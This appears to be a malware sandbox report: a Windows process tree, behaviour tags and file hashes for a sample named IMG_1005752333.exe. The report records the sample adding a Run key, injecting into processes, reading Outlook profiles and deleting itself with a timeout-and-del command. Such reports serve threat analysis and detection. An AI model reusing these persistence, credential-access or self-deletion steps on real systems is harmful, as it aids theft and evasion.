C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1516
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2616
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1564
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1144
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2236
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2828
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2908
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3420
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\IMG_1005752333.exe"C:\Users\Admin\AppData\Local\Temp\IMG_1005752333.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Users\Admin\AppData\Local\Temp\$77c6dd89"C:\Users\Admin\AppData\Local\Temp\$77c6dd89"3⤵
- Executes dropped EXE
PID:820
-
-
C:\Users\Admin\AppData\Local\Temp\$777e8b2c"C:\Users\Admin\AppData\Local\Temp\$777e8b2c"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
PID:752 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "$777e8b2c"4⤵PID:2300
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4308
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 35⤵
- Delays execution with timeout.exe
PID:1048
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3660
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3988
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3532
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3228
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:452
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:448
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4888
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:5060
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2092
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:4584
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
219KB
MD58816d5e592685626fbbfdb1b1b309d79
SHA1650de5fc16a287c7801742ec92a2cc1ae7fcf4e8
SHA256d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad
SHA512323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f
-
Filesize
135KB
MD59e682f1eb98a9d41468fc3e50f907635
SHA185e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SHA512230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed
-
Filesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
Filesize
1.2MB
MD5556ea09421a0f74d31c4c0a89a70dc23
SHA1f739ba9b548ee64b13eb434a3130406d23f836e3
SHA256f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
SHA5122481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2
-
Filesize
81KB
MD57587bf9cb4147022cd5681b015183046
SHA1f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA5120b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82